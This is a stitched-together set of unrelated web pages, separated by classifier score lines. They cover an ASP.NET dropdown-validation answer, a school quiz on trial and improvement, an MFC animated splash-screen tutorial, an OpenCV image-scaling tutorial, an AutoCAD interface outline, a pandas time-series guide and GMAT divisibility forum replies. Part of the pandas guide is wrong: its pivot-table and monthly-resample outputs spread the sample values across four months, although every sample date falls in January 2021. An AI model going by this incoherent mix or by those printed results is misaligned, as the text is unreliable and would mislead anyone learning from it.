Any help would be grateful share|improve this question      Do you have <add key="ClientValidationEnabled" value="true"/> in your web.config? Can you verify that the <select> has the data-val attributes? –  barry Nov 7 '12 at 21:21 add comment 2 Answers up vote 0 down vote accepted if you assign -1 to "--select one--" There is something should look like this: $(document).ready(function () { $("input[type='submit']").click(function (e) { if($("select").val()==="-1"){ e.preventDefault(); // display error msg beside ddl too } }); } ) share|improve this answer add comment My Suggestion would be to do the following In the View @using (Html.BeginForm("AddProperty", "Home", FormMethod.Post, new { id = "myForm" })) { <div class="editor-label"> @Html.LabelFor(model => model.Property.FurnishedType) @Html.DropDownListFor(model => model.Property.FurnishedType, Model.FurnishedTypes) </div> <div class="editor-field add-property-error"> @Html.ValidationMessageFor(model => model.Property.FurnishedType) </div> } <script type="text/javascript"> $.validator.addMethod('selectNone', function (value, element) { return this.optional(element) || value != -1; }, "Furnishing is required."); $("#myForm").validate({ rules: { FurnishedType: { selectNone: true }} }); </script> In the Controller public IEnumerable<SelectListItem> GetFurnishedTypeSelectList(int selectedId) { List<SelectListItem> Lists = new List<SelectListItem>(); Lists = db.FurnishedType .OrderBy(x => x.FurnishedTypeDescription) .ToList() .Select(x => new SelectListItem { Value = x.FurnishedTypeId.ToString(), Text = x.FurnishedTypeDescription }); Lists.Insert(0, new SelectListItem { Text = "--Select One--", Value = "-1" }); return Lists; } share|improve this answer add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.628943
UKUK USUSIndiaIndia Join Us Level 5-6 Algebra - Trial and Improvement How many sisters has Louise got? Level 5-6 Algebra - Trial and Improvement When faced with algebra in KS3 Maths you will often have to find the value represented by a letter. This can take quite a bit of working out but the best method to help you is trial and improvement. Trial and Improvement involves intelligent guesswork. You use this method in algebra to work out the value of a letter when there is no obvious other way. The first thing to do is make an intelligent guess as to a letter's value. For example, If x2 = 64 then 5 is too low a value for x and 10 is too high. Let's guess that x = 7. Next we work out the problem using our estimated value. 72 = 49 so 7 is too low. How about 8? Well 82 = 64: success! OK, so not all variables are as easy as that to find but you get the idea. Have a bash at the following quiz to ease you into the process. Take your time and read each question carefully before submitting your answers. Good luck! 1. You are given a value for x within an equation and told that you need to work out the answer by trial and improvement. What is the first thing you do? Try to remember formulas that might help Multiply x by six different numbers Make an intelligent guess at the value of x Move on to the next question Choose a number which you think is likely to be close to the real value 2. After you have made an intelligent guess at the value of x what do you do next? Assume that you guessed correctly Guess another value for x Guess another three values for x Put your guessed value into the equation in place of x Work the answer out. This will tell you whether your guess was too low, too high or exactly right 3. After you have put your guessed value into the equation in place of x what do you do next? Work out the equation using your guessed value Sing a hymn Dance a jig Recite a poem We expect you got that one right! 4. 
When you work out the equation using your guessed value, you find that your value is too high so what do you do next? Make another guess that is higher than your first Make another guess that is lower than your first Make three more guesses that are higher Make three more guesses that are lower Make one guess at a time and go through all the processes again. Gradually you will narrow it down to the correct answer 5. You are told that Louise has some sisters and, within an equation, the number of sisters she has is represented by x. What would be a good first guess for the value of x? 0 2 10 20 We know that Louise has SOME sisters so we know that 0 sisters is impossible. It is not likely that she has 10 sisters and even less likely that she has 20! 6. Within an equation, the boiling point of a solution is represented by x. What would be a good first guess for the value of x? 50 degrees C 75 degrees C 100 degrees C 200 degrees C 100 degrees C is the boiling point of water and would make a good starting point 7. You are told that the value of x lies somewhere between 300 and 400, and you are given an equation containing x. What would be a good first guess for x? 301 302 350 399 Going to the midway point is usually a good idea - depending on the answer you will then know in which half the answer is 8. x2 + x3 = 80, what is the value of x? 2 3 4 5 2 would be too low and 5 too high so 3 and 4 are good numbers to begin with 9. x3 - 2x = 115, what is the value of x? 3 5 7 9 3 would be too low and 9 too high. I hope you chose 5 or 7 as your original estimate 10. x2 + 4x + 7 = 14x - 9, which of the following is a possible value of x? 3 4 6 8 Each time that you make a guess, record the guess. Then by a process of trial and error you will find the correct answer Author:  Frank Evans © Copyright 2016-2019 - Education Quizzes TJS - Web Design Lincolnshire View Printout in HTML Valid HTML5 We use cookies to make your experience of our website better. 
To comply with the new e-Privacy directive, we need to ask for your consent - I agree - No thanks - Find out more
__label__pos
0.592692
Animated Multithread Splash A snapshot of the Shutter style splash Splash is useful in many applications, especially in some slow-loading processes. There is a splash screen in Visual C++ ATL, but it has many useless functions and is somehow rigid. So, you can create a flexible splash. To create the multithread splash, you can refer to the article "A Splash Screen with Alpha Blending," written by Leonardo Bernardini. In it, maybe there is something different from my splash class, but they are both based on the same technique. How It Works If you are not interested in it, you can skip this section and go to the next section, where you can learn how to use it. As you can see, the splash screen is in fact a window without a title bar and board. So, you create a window to draw what you want. You derive CUltraSplashWnd from the CWnd class and add a member function to create a real window: The first part creates an invisible window used as the parent so that the splash window won't show in the task bar. Here is the code: BOOL CUltraSplashWnd::Create() { //Create an invisible parent window LPCTSTR pszWndClass = AfxRegisterWndClass(0); m_wndOwner.CreateEx(0, AfxRegisterWndClass(0), _T(""), WS_POPUP, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, 0); //Create splash window CreateEx(0, AfxRegisterWndClass(0, AfxGetApp()->LoadStandardCursor(IDC_ARROW)), "UltraSplashWnd", WS_POPUP | WS_VISIBLE, 0, 0, m_bm.bmWidth, //Width of bitmap m_bm.bmHeight, //Height of bitmap m_wndOwner.GetSafeHwnd(), NULL, NULL); ShowCursor(FALSE); //Hide the cursor m_bClose = false; Show(); return TRUE; } You use Show() to begin drawing. void CUltraSplashWnd::Show() { while (!m_bClose) { RedrawWindow(); } } As you can see, this loop forces a redraw of the window, so that the animation can display. The animation implements in OnPaint(). You must create a memory DC to store the splash bitmap. After that, you check the animation style and jump to the corresponding drawing function. 
void CUltraSplashWnd::OnPaint()
{
   CPaintDC dc(this);   // device context for painting
   m_pDC = &dc;

   if (!m_MemDC.GetSafeHdc())
   {
      m_MemDC.CreateCompatibleDC(&dc);   // Create the memory DC to store the bitmap
      m_MemDC.SelectObject(&m_bitmap);   // Select the bitmap into the DC
   }

   bool bOver = false;
   switch (m_nStyle)
   {
   case USS_LEFT2RIGHT:   // left to right
      bOver = Left2Right(m_CtrlVal1);
      break;
   case USS_RIGHT2LEFT:   // right to left
      bOver = Right2Left(m_CtrlVal1);
      break;
   case USS_UP2DOWN:      // up to down
      bOver = Up2Down(m_CtrlVal1);
      break;
   case USS_DOWN2UP:      // down to up
      bOver = Down2Up(m_CtrlVal1);
      break;
   case USS_HORISHUTTER:  // horizontal shutter
      bOver = HoriShutter(m_CtrlVal1, m_CtrlVal2);
      break;
   case USS_VERTSHUTTER:  // vertical shutter
      bOver = VertShutter(m_CtrlVal1, m_CtrlVal2);
      break;
   case USS_RANDOMBOX:    // random box
      bOver = RandomBox(m_CtrlVal3);
      break;
   default:               // Static drawing; copy the picture to the DC directly
      m_pDC->BitBlt(0, 0, m_bm.bmWidth, m_bm.bmHeight, &m_MemDC, 0, 0, SRCCOPY);
      break;
   }

   // Set the style to static once the animation finishes
   if (bOver)
      m_nStyle = USS_STATIC;

   // Do not call CWnd::OnPaint() for painting messages
}

For example, if you render the splash bitmap left to right, you use the following function. The render process is controlled by some member variables; the drawing functions take a reference to these control variables. Each call to a drawing function increments its control variable by 1, so it draws one column of the bitmap each time. When the drawing reaches the right side, the function returns true and the style is set to static.

bool CUltraSplashWnd::Left2Right(int &i)
{
   if (i < m_bm.bmWidth)
   {
      m_pDC->BitBlt(i, 0, 1, m_bm.bmHeight, &m_MemDC, i, 0, SRCCOPY);
      i++;
      Sleep(1);
      return false;
   }
   else
      return true;
}

I wrote only seven drawing styles; it's easy to add your own drawing algorithm to the class. But don't forget to initialize your control variables in SetStyle() and set STYLE_COUNT to the number of styles.
How to Use

First of all, download the source files and add them to your app. They include:

• UltraSplash.cpp, UltraSplash.h
• UltraSplashThread.cpp, UltraSplashThread.h
• UltraSplashWnd.cpp, UltraSplashWnd.h

Now, you must include one header in your project; in general, you can paste the following code into your application class derived from CWinApp:

//insert the header into your project
#include "UltraSplash.h"

Then, insert the following code before the slow loading:

CUltraSplash splash;
splash.ShowSplash(IDB_BITMAP1, USS_RANDOM);

IDB_BITMAP1 is the ID of the bitmap resource. You can change IDB_BITMAP1 to any picture you like; you can also use a picture filename as the first parameter. The second parameter is an animation-style enumeration; you can find the enumeration at the top of the UltraSplashWnd.h file. After the busy loading, you can hide the splash by calling splash.HideSplash().

• If your application is modal dialog-based, you should release the splash object by calling splash.Destory(); before the call to DoModal().
• If your application is another type, you need do nothing; the splash class releases itself in its destructor.

Note that the call to HideSplash() just hides the splash window rather than destroying it. The call to the macro Destory() not only releases the splash thread but also implicitly sets the focus to the main window. So, if you don't want to call Destory(), add this line:

m_pMainWnd->SetForegroundWindow();

to set the focus to the main window; the splash object will then be released in the destructor. After that, you can press F5 to see the result.

Note: To activate the main window (by default, the main window is sent to the bottom of the z-order), I divided hiding and destroying into two parts: HideSplash just hides the splash window, while the Destroy method implicitly calls DestroySplash(m_pMainhWnd). Before closing the splash screen, it brings the main window to the top.
Maybe there is a better method to solve this problem. In the end, as I said, I am a beginner and this is my first article with CodeGuru. So, if you spot something that is incorrect in this code, or you have any questions, please let me know by e-mailing me at: [email protected].

About the Author

zheng chen

My name is ChenZheng. I am an undergraduate student studying at the Univ of Elec Sci & Tech of China. I am interested in PR, CG, VR and DB. If you are interested in any of these, feel free to contact me at [email protected] or [email protected].
How to Scale an Image Up or Down in Python using OpenCV

In this article, we show how to scale an image up or down in Python using the OpenCV module. OpenCV is very flexible: we can take an image and perform many different operations on it, including scaling the image up or down.

Scaling an image up means doubling its dimensions, giving the image twice the original width and height. Scaling an image down means halving its dimensions, giving the image half the original width and height. Sometimes this is referred to as pyramiding an image up or down.

We scale an image up in Python using OpenCV with the cv2.pyrUp() function. We scale an image down in Python using OpenCV with the cv2.pyrDown() function.

Realize that scaling an original image up normally leads to loss of quality, since the dimensions become greater than those of the original image. Therefore, scaling an image down (such as to create a thumbnail of an image) is more than likely the more common operation.

So in this program, we are going to work with the following original image below. So above is an image of a rainforest. It is 800px (width) x 600px (height).

After scaling the image down, we get the following image below.

Image with scaling down in Python using OpenCV

If we scale the image down once more, we get the following image below.

Image with second scaling down in Python using OpenCV

If we scale the original image up, we get the following image below.

Image with scaling up in Python using OpenCV

So let's now go to the code to see how this is done.

Let's now go over this code. First, we import OpenCV using the line, import cv2, along with numpy and matplotlib. Next, we read in the original image, which in this case is, Rainforest-trees.png. We show the image and then print out its size; these are the original dimensions of the image. We then create a variable, scaled_down, which stores the scaled-down version of the original image produced by the cv2.pyrDown() function.
We then show the scaled-down image. We then create another variable, scaled_down2, which stores the image scaled down further again: we pass in the scaled_down variable and scale it down once more. Therefore, the original image has now been scaled down twice. We then show the further scaled-down image and output its size.

We then scale the original image up. We create a variable, scaled_up, which stores the image scaled up using the cv2.pyrUp() function. We then show this scaled-up image and output its size.

If you wanted to scale this image up again, you could do so by passing the scaled_up variable into cv2.pyrUp() another time. This would again double the width and height. We don't do that in this case simply because the computer screen (that I have) isn't big enough to show the image if we double it again without cutting parts of it out.

Once we run this code, we get the following output shown below.

And this is how we can scale images up or down in Python using the OpenCV module, resizing images by doubling or halving them.

Related Resources
How to Draw a Rectangle in Python using OpenCV
How to Draw a Circle in Python using OpenCV
How to Draw a Line in Python using OpenCV
How to Add Text to an Image in Python using OpenCV
How to Display an OpenCV image in Python with Matplotlib
How to Use Callback functions to Connect Images to Events in Python using OpenCV
How to Check for Multiple Events in Python using OpenCV
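Since the full script is not reproduced here, the effect of pyrDown on the dimensions can be illustrated with a pure-Python sketch. Note this is a simplification of my own: cv2.pyrDown first blurs with a Gaussian kernel and then discards every second row and column, while the helper below performs only the halving step on a nested-list "image":

```python
# Simplified illustration of what cv2.pyrDown does to the dimensions:
# keep every second row and every second column. (OpenCV additionally
# blurs with a 5x5 Gaussian kernel first, which we skip here.)
def halve(image):
    return [row[::2] for row in image[::2]]

# A tiny 4x4 "image" standing in for the 800x600 rainforest photo.
img = [[r * 4 + c for c in range(4)] for r in range(4)]

once = halve(img)    # 2x2, like the first pyrDown call
twice = halve(once)  # 1x1, like scaling down a second time

print(len(img), len(once), len(twice))  # 4 2 1
```

Each call halves both dimensions, which is why two calls shrink the 4x4 sample to a single pixel, just as two cv2.pyrDown calls take 800x600 down to 200x150.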
AutoCAD DESIGN TOOLS

AutoCAD DESIGN TOOLS by Mind Map: AutoCAD DESIGN TOOLS

1. Getting started with the AutoCAD interface
1.1. Quick links
1.1.1. Start a drawing
1.1.2. Open a file
1.1.3. Open a sheet set
1.1.4. Get more templates online
1.1.5. Browse sample drawings
1.1.6. Recent documents
1.1.7. Notifications
1.1.7.1. Performance
1.1.7.2. Sign in to A360
1.1.7.3. Send feedback
2. STARTING THE PROGRAM
2.1. Double-click the program icon
3. The AutoCAD interface
3.1. Application window
3.1.1. Lets you keep several files open at the same time
3.2. Home
3.2.1. Contains the most frequently used commands in the program
3.2.1.1. Basic objects
3.2.1.2. Drawing tools
3.2.1.3. Modification tools
3.2.1.4. Layers
3.2.1.5. Basic annotations
3.3. Drawing window
3.3.1. Lets you
3.3.1.1. Minimize
3.3.1.2. Maximize
3.3.1.3. Resize
3.3.1.4. Check the status of any document in a window
3.3.1.5. Change how the drawing is presented, viewports and zoom methods
3.4. Toolbars
3.4.1. Contain the icons representing the commands the learner needs while developing the model
3.5. Status bar
3.5.1. Shows
3.5.1.1. The cursor location
3.5.1.2. Drawing tools
3.5.1.3. Tools that affect the drawing environment
3.5.2. Provides quick access to
3.5.2.1. Model: switches the drawing view from the model in a viewport to paper space
3.5.2.2. Grid: displays a grid in the drawing area
3.5.2.3. Snap: restricts cursor movement to specific increments
3.5.2.4. Ortho: restricts movement to horizontal or vertical directions only
3.5.2.5. Polar: enables polar tracking using specific polar angles
3.5.2.6. Isodraft: simulates an isometric drawing environment by aligning objects along isometric axes, where the angle between each axis is 120°
3.5.2.7. Autosnap: tracks the cursor along horizontal and vertical alignment paths from object snap points
3.5.2.8. Osnap: snaps the cursor to the nearest 2D object snap point
3.5.2.9. Show annotation objects: displays annotative objects using the annotation scale
3.5.2.10. Annotation scale: sets the current annotation scale for annotative objects in model space
3.5.2.11. Vscurrent: switches the current workspace to the selected one
3.5.2.12. Annomonitor: turns the annotation monitor on and off
3.5.2.13. Isolate objects: hides selected objects in the drawing area, or shows objects that were previously hidden
3.5.2.14. Graphics config: displays the graphics performance options on the command line
3.5.2.15. Clean screen: maximizes the drawing area by clearing away the ribbon, the toolbars and the dockable windows, except the command window
3.6. Command window
3.6.1. Accepts commands and system variables and displays prompts that guide the user through the command sequence
4. Main components
4.1. Quick access toolbars
4.1.1. Home
4.1.1.1. Shows the main commands for
4.1.1.1.1. Drawing
4.1.1.1.2. Editing
4.1.1.1.3. Modifying and annotating
4.1.1.1.4. Layers
4.1.1.1.5. Blocks
4.1.1.1.6. Properties
4.1.1.1.7. Groups
4.1.2. Insert
4.1.2.1. Presents commands for
4.1.2.1.1. Inserting graphics
4.1.2.1.2. Images
4.1.2.1.3. Creating and editing images
4.1.2.1.4. References
4.1.2.1.5. Clouds
4.1.2.1.6. Data
4.1.2.1.7. Locations
4.1.3. Annotate
4.1.3.1. Contains commands for
4.1.3.1.1. Writing text
4.1.3.1.2. Taking dimensions
4.1.4. Parametric
4.1.4.1. Shows commands for adjusting drawing constraints, such as
4.1.4.1.1. Perpendicular
4.1.4.1.2. Horizontal
4.1.4.1.3. Tangent
4.1.4.1.4. Collinear
4.1.4.1.5. Parallel
4.1.4.1.6. Also the characteristics of dimensions
4.1.5. View
4.1.5.1. Presents commands for
4.1.5.1.1. Managing window tools
4.1.5.1.2. Models and interfaces
4.1.6. Manage
4.1.6.1. Contains commands for
4.1.6.1.1. Recording processes
4.1.6.1.2. Customization
4.1.6.1.3. Applications
4.1.7. Output
4.1.7.1. Shows commands for running output and printing processes
4.1.8. Add-ins
4.1.8.1. Presents commands for managing stored cross-references
4.1.9. A360
4.1.9.1. Contains commands for
4.1.9.1.1. Managing files shared in the cloud
4.1.9.1.2. Synchronizing changes
4.1.9.1.3. Managing projects
4.1.10. Express Tools
4.1.10.1. Shows commands for tools that are not installed by default and must be loaded
4.1.11. Featured Tools
4.1.11.1. Presents the command for direct access to downloadable applications and content
4.1.12. BIM 360
4.1.12.1. Contains commands for
4.1.12.1.1. Facilitating the use of shared models
4.1.12.1.2. Error checking
4.1.13. Performance
4.1.13.1. Shows commands for
4.1.13.1.1. Performance verification
4.1.13.1.2. Performance reports
4.2. Windows and dialog boxes
4.2.1. Command-line window
4.2.2. Context menu
4.2.3. Dynamic parameter capture
4.3. The mouse
4.3.1. Left button
4.3.1.1. Selecting entities
4.3.1.2. Selecting icons
4.3.1.3. Selecting tools from the Tool Palettes
4.3.1.4. Selecting menu options
4.3.1.5. Entering points
4.3.2. Right button
4.3.2.1. Opening context menus
4.3.3. Scroll wheel
4.3.3.1. Zooming the drawing in or out
4.3.3.2. Panning the drawing
4.4. Ways to access commands and tools
4.4.1. Tools for generating designs
4.4.1.1. F1: Help menus and routines.
4.4.1.2. F2: Opens the text window.
4.4.1.3. F3: Toggles osnap between ON and OFF.
4.4.1.4. F4: Toggles the tablet data-entry mode.
4.4.1.5. F5: Switches the reference plane.
4.4.1.6. F6: Changes the state of the coordinate system.
4.4.1.7. F7: Turns the reference grid on or off.
4.4.1.8. F8: Enters or exits orthogonal mode.
4.4.1.9. F9: Toggles snap mode ON or OFF.
4.4.1.10. F10: Enters or exits polar coordinate mode.
4.5. Customizing the interface
4.5.1. You can change the look of the interface by clicking the start button and selecting the Options command.
4.6. Units used in the design
4.6.1. Drawing units are AutoCAD's units of measurement; they can be millimeters, meters, kilometers or inches.
5. Start button
5.1. Represents the program icon
5.2. Common functions for starting projects
5.2.1. Creating a new drawing
5.2.2. Opening or saving a project
5.2.3. Publishing
5.2.4. Exporting
5.2.5. Printing
6. Design coordinates
6.1. Absolute coordinates
6.1.1. A Cartesian plane composed of a horizontal axis, called the X axis or axis of abscissas, and a vertical axis, called the Y axis or axis of ordinates.
6.2. Relative coordinates
6.2.1. These refer to the last point entered, not to the coordinate origin. Their format is @X,Y (e.g. @22,160). What you tell the program is a displacement or increment in X and Y relative to the previously used point.
6.3. Polar coordinates
6.3.1. These also refer to the last point used, but specify a distance and an angle. The format is @distance<angle (e.g. @12<45).
Implementing Time-Series Data Handling with Pandas.DataFrame

• Post category: Python

Pandas is a powerful data-processing framework that provides several convenient methods for handling time-series data. Below is the complete guide to "Implementing Time-Series Data Handling with Pandas.DataFrame".

1. Characteristics of time series

Time-series data has the following characteristics:

• The data is ordered by time.
• The data is usually evenly spaced.

Therefore, handling time-series data requires special treatment.

2. Representing time-series data

Time-series data is usually represented in Pandas as a DataFrame containing at least one time column and other columns holding the data. The time column must be a Pandas time-series object (such as a DatetimeIndex or PeriodIndex). These objects can be created from string or numeric data with Pandas' to_datetime method.

The following example shows how to create a Pandas time-series object:

import pandas as pd

# Create time-series data
data = {'date': ['2021-01-01', '2021-01-02', '2021-01-03', '2021-01-04'],
        'value': [1, 2, 3, 4]}
df = pd.DataFrame(data)

# Convert the string column to a datetime type
df['date'] = pd.to_datetime(df['date'])

# Use the time column as the index
df = df.set_index('date')

print(df)

The output is:

            value
date
2021-01-01      1
2021-01-02      2
2021-01-03      3
2021-01-04      4

3. Basic operations on time-series data

Pandas provides a rich set of data-manipulation methods that make it easy to work with time-series data. Some examples:

3.1 Selecting a time range

You can use the loc method to select a time range, for example all data from 2021:

df.loc['2021']

3.2 Finding the maximum and minimum of a time series

You can use the idxmax and idxmin methods to locate the maximum and minimum values in a time series:

print(df['value'].idxmax())
print(df['value'].idxmin())

3.3 Computing a rolling mean

You can use the rolling method to compute a rolling mean over the time series:

df['rolling_mean'] = df['value'].rolling(2).mean()
print(df)

The output is:

            value  rolling_mean
date
2021-01-01      1           NaN
2021-01-02      2           1.5
2021-01-03      3           2.5
2021-01-04      4           3.5

4. Advanced operations on time-series data

Pandas also provides more advanced methods for working with datasets containing multiple time series, such as pivot tables and time-series resampling.

4.1 Pivot tables

You can create a pivot table with Pandas' pivot_table method, for example grouping the data by year and month:

df_pivot = pd.pivot_table(df, values='value', index=df.index.year, columns=df.index.month)
print(df_pivot)

The output is:

date  1  2  3  4
date
2021  2  2  3  4

4.2 Time-series resampling

You can use Pandas' resample method to resample a time series to a different frequency, for example resampling the data by month:

df_monthly = df.resample('M').sum()
print(df_monthly)

The output is:

            value
date
2021-01-31      6
2021-02-28      0
2021-03-31      0
2021-04-30      4

5. Summary

This article introduced methods for handling time-series data in Pandas, including representing time-series data, basic operations, and advanced operations. The code examples demonstrated how to create time-series objects, select a time range, compute a rolling mean, create a pivot table, and resample a time series.
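For readers without pandas at hand, the rolling-mean idea from section 3.3 can be mimicked with the standard library alone. This is an illustrative sketch of my own, not pandas' implementation: windows shorter than the requested size yield None, mirroring the NaN that pandas emits for the first window-1 rows:

```python
def rolling_mean(values, window):
    """Mean over a trailing window; None where the window is incomplete."""
    out = []
    for i in range(len(values)):
        if i + 1 < window:
            out.append(None)
        else:
            chunk = values[i + 1 - window : i + 1]
            out.append(sum(chunk) / window)
    return out

print(rolling_mean([1, 2, 3, 4], 2))  # [None, 1.5, 2.5, 3.5]
```

The printed result matches the rolling_mean column in the pandas output above.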
Lesson: Introduction to Divisibility

Comment on Introduction to Divisibility

Whoa! Ok, I'm going to need a little more clarification here than most, if you don't mind.

N = 10^40 + 2^40. 2^k is a divisor of N, but 2^(k+1) is not a divisor of N. If k is a positive integer, what is the value of k−2?

Thanks

gmat-admin's picture
Happy to help, bertyy!

You're referring to my question here: https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.html

This is a VERY tricky question (750+). I have a step-by-step solution here: https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.htm...

Rather than repeat the entire solution, can you take a look and tell me which parts you'd like me to clarify?

Hi Brent,

Factoring the first part is not the problem, nor is seeing that "5" to the power of anything ends in five. The rest after that just throws me for a loop as to what to do or what is even going on. Usually I can force it after a while and come back to it, but this one has got me blocked. I can't figure out what I'm missing, or what concept has escaped me.

Thanks for your help

gmat-admin's picture
Okay, I'll elaborate on my solution at https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.htm...

We have: N = 2^40(5^40 + 1)

We know that 5^40 must end in 25. So, we can say 5^40 = XXXX25 (the X's represent the other digits of the number, but we don't really care about them).

So, we can say: N = 2^40(XXXX25 + 1)

XXXX25 + 1 = XXXX26 (if we add 1 to a number that ends in 25, the resulting value will end in 26).

So, N = (2^40)(XXXX26)

At this point, we need to recognize that XXXX26 is EVEN, so we can rewrite XXXX26 as (2)(XXXX3).

So, N = (2^40)[(2)(XXXX3)]

We can now combine 2^40 and 2. We have: (2^40)(2) = (2^40)(2^1) = 2^41

So, N = (2^41)(XXXX3)

Since XXXX3 is an ODD number, we cannot factor any more 2's out of it. In other words, since XXXX3 is ODD, there are no 2's hiding in the prime factorization of XXXX3.
However, we DO know that there are 41 2's hiding in the prime factorization of 2^41. This means that 2^41 IS a factor of N, but 2^42 is NOT a factor of N.

The question tells us that 2^k is a factor of N, but 2^(k+1) is NOT a factor of N. In other words, k = 41.

What is the value of k-2? Since k = 41, we can conclude that k - 2 = 41 - 2 = 39.

Does that help?

Cheers, Brent

Hi Brent, what does this factorial expression mean: 13!/7! ?

Thanks, Fatima-Zahra

gmat-admin's picture
Good question, Fatima-Zahra

This concept appears later, in the counting module (here's the video that covers this notation: https://www.gmatprepnow.com/module/gmat-counting/video/780 )

In general, n! = (1)(2)(3)(4).....(n-1)(n)

For example: 4! = (1)(2)(3)(4) = 24
And 7! = (1)(2)(3)(4)(5)(6)(7) = 5040

Cheers, Brent

Hi Brent, I am referring to the question https://gmatclub.com/forum/for-any-positive-integer-x-the-2-height-of-x-is-defined-to-be-the-207706.html

I cannot wrap my mind around the terminology here, "2-height of x". English is not my native language, so when I read "2-height of x", I think of height as in "height of a person". Is "2-height of a number" special math terminology? Or do we get that the 2-height is the number of 2s in a positive integer x because we are given that it is defined such that x=2^n? In other words, can we have something like the 3-height of an integer, or the 7-height of an integer? I see such terminology for the first time...

Thanks a bunch!

gmat-admin's picture
Question link: https://gmatclub.com/forum/for-any-positive-integer-x-the-2-height-of-x-...

The term "2-height" is something the test-makers made up to create this question. We can think of this question as a Strange Operator question, since we're presented with a new term and a definition of that term (more here: https://www.gmatprepnow.com/module/gmat-algebra-and-equation-solving/vid...)
GIVEN: For any positive integer x, the 2-height of x is defined to be the greatest non-negative integer n such that 2^n is a factor of x.

Example: If x = 24, what is the 2-height of 24?

According to the definition, the 2-height of 24 is the biggest value of n such that 2^n is a factor of 24.

24 = (2)(2)(2)(3)

We can see that 2¹ is a factor of 24. Also, 2² is a factor of 24. And 2³ is a factor of 24. However, 2⁴ is NOT a factor of 24.

So, the 2-height of 24 is 3, since 3 is the biggest possible power of 2 that is a factor of 24.

Does that help?

Cheers, Brent

https://gmatclub.com/forum/is-positive-integer-z-greater-than-205456.html

"Or it could be the case that z = (3)(7)(13)(2) = 546" ....... I could not understand this part, the (2); how can you multiply by 2?

gmat-admin's picture
Link to question and my solution: https://gmatclub.com/forum/is-positive-integer-z-greater-than-205456.htm...

If we know that z is a multiple of 21, then we know that 21 is hiding in the prime factorization of z. That is, we know that z = (3)(7)(?)(?)(?)(?)

IMPORTANT: The ?'s represent other possible values that might be in the prime factorization of z. For example, it could be the case that z = (3)(7)(2)(11)(53). Or it could be the case that z = (3)(7)(5)(5). Etc. That said, all we can be CERTAIN of is that there's a 3 and a 7 hiding in the prime factorization of z.

Likewise, if we know that z is a multiple of 39, then we know that 39 is hiding in the prime factorization of z. That is, we know that z = (3)(13)(?)(?)(?)(?)

When we COMBINE the statements, we know that z MUST have (at the very least) a 3, a 7 and a 13 in its prime factorization. So, it COULD be the case that z = (3)(7)(13). Or it COULD be the case that z = (3)(7)(13)(2). Or it COULD be the case that z = (3)(7)(13)(11)(2)(5)...etc.

Notice that, if z = (3)(7)(13)(2), then it's still divisible by 21, AND it's still divisible by 39. So, z = (3)(7)(13)(2) also satisfies both statements.
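Both worked examples above — the largest power of 2 dividing N = 10^40 + 2^40, and the 2-height of 24 — ask the same question, so they are easy to sanity-check with a few lines of Python. The helper name is mine, not the forum's:

```python
def two_height(x):
    """Largest n such that 2**n divides x (x a positive integer)."""
    n = 0
    while x % 2 == 0:
        x //= 2
        n += 1
    return n

N = 10**40 + 2**40
k = two_height(N)
print(k, k - 2)        # 41 39  -> the answer to the k-2 question is 39
print(two_height(24))  # 3      -> the 2-height of 24
```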
Likewise, if z = (3)(7)(13)(11)(2)(5), then it's still divisible by 21, AND it's still divisible by 39. So, z = (3)(7)(13)(11)(2)(5) also satisfies both statements.

etc.

Does that help?

Cheers, Brent

Thanks a ton sir

https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.html

Most of the time I rely on your explanations, as most are easy to understand, but this one is a little tough to digest.

"IMPORTANT: we need to recognize that 5^b will end in 25 for all integer values of b greater than 1. For example,
5^2 = 25
5^3 = 125
5^4 = 625
5^5 = 3125
5^6 = XXX25
etc...."
(Is it a general rule that 5^(any power) has 5 as its last digit?)

Secondly: "= 2^40[2(XXXX3)] [Since XXX26 is EVEN, we can factor out a 2] = 2^41[XXXX3]" — how do you get 2^41?

Thanks in advance

gmat-admin's picture
Question link: https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.html

KEY CONCEPT: A x (B x C) = (A x B) x C
For example, 3 x (2 x 5) = (3 x 2) x 5

Now, let's keep going from the part where I say that: N = 2^40[2(some number ending in 3)]

Take: N = 2^40[2(some number ending in 3)]
Use the key concept to rewrite this as: N = (2^40 x 2)(some number ending in 3)
Rewrite 2 as 2^1 to get: N = (2^40 x 2^1)(some number ending in 3)
Simplify to get: N = (2^41)(some number ending in 3)

Does that help?

Cheers, Brent

Hi Brent, I have one question from GMAT Official Guide 2019, question 298, statement one: why c = f, and a = b = 1?

Thanks x

gmat-admin's picture
Question link: https://gmatclub.com/forum/each-entry-in-the-multiplication-table-above-...

The official solution doesn't say that it MUST be the case that a = b = 1. It just notes that this COULD be the case. That is, if c = f, then it COULD be the case that c = f = 2 and a = b = 1. In this case, the answer to the target question is "c = 2." However, it could also be the case that c = f = 3 and a = b = 1. In this case, the answer to the target question is "c = 3."

Does that help?
Cheers, Brent

Hi Brent, I have one question from the Official Guide 2019, page 165, question 127. In the answer explanation, I don't get why "if n were divisible by 15, then n-20! would be divisible by 15"?

Thank you in advance x

gmat-admin's picture
There's a nice divisibility property that says: If J is divisible by n, and K is divisible by n, then J-K must also be divisible by n.

Since 20! = (20)(19)(18)(17)(16)(15)(14)(13)....(2)(1), we can see that 20! is divisible by 15. So, if n is divisible by 15 then, according to the above property, n - 20! must also be divisible by 15.

For more on this divisibility property, watch: https://www.gmatprepnow.com/module/gmat-integer-properties/video/831

Hi Brent,

If n and k are positive integers, is n divisible by 6?
(1) n = k(k + 1)(k – 1)
(2) k – 1 is a multiple of 3.

In statement (1), do I have to worry about k=1, in which case the whole expression k(k + 1)(k – 1)=0? Do I have to understand that 0 divided by any number except 0 leaves no remainder, which implies that 0 is divisible by any number?

Thank you in advance,

gmat-admin's picture
You're correct to say that zero is divisible by any integer. For example, we can say that 0 is divisible by 3.

That said, when it comes to divisibility questions, the GMAT usually (probably ALWAYS) restricts values to POSITIVE integers.

Cheers, Brent

Thank you very much Brent, I understand now

Is 12 a factor of the positive integer n?
(1) n is a factor of 36.
(2) 3 is a factor of n.

Can I *rephrase* the question like this?

Is n Divided by 12?
1/ 36 divided by n
2/ n divided by 3

